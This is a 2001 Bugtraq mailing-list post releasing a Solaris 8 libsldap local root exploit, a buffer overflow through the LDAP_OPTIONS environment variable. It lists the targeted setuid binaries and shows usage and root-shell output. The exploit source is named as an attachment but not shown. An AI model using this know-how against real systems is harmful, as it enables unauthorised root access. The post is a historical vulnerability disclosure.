Bugtraq mailing list archives
Solaris 8 libsldap exploit
From: Noir Desir <noir () gsu linux org tr>
Date: Thu, 5 Jul 2001 14:14:09 +0300 (EEST)
Hi, I wish to free this one since it has been made public by some ppl. libsldap hole has been known for long. As far as I know, sway () hack co za did actually found the hole several months ago and generously let me know about it. All propz goes to him. Thanks bro. Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with success. I usually support the anti-sec movement but I got my reasons to publish the exploit. If you want to know why, please do mail me. $ ./libsldap-exp libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow Exploit code: noir () gsu linux org tr Bug discovery: sway () hack co za Usage: ./libsldap-exp target# target#: 0, /usr/bin/passwd Solaris8, Sparc64 target#: 1, /usr/bin/nispasswd Solaris8, Sparc64 target#: 2, /usr/bin/yppasswd Solaris8, Sparc64 target#: 3, /usr/bin/chkey Solaris8, Sparc64 target#: 4, /usr/lib/sendmail Solaris8, Sparc64 $ ./libsldap-exp 0 # id uid=0(root) gid=0(root) # PS: t(L)amer sahin kicina oyle bir tekme yiyeceksinki, agzindan cikicak. Haberin olsun istedim : ) Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos cheers, noir
Attachment:
libsldap-exp.c
Description:
Current thread:
- Solaris 8 libsldap exploit Noir Desir (Jul 05)
- Re: Solaris 8 libsldap exploit Fyodor (Jul 05)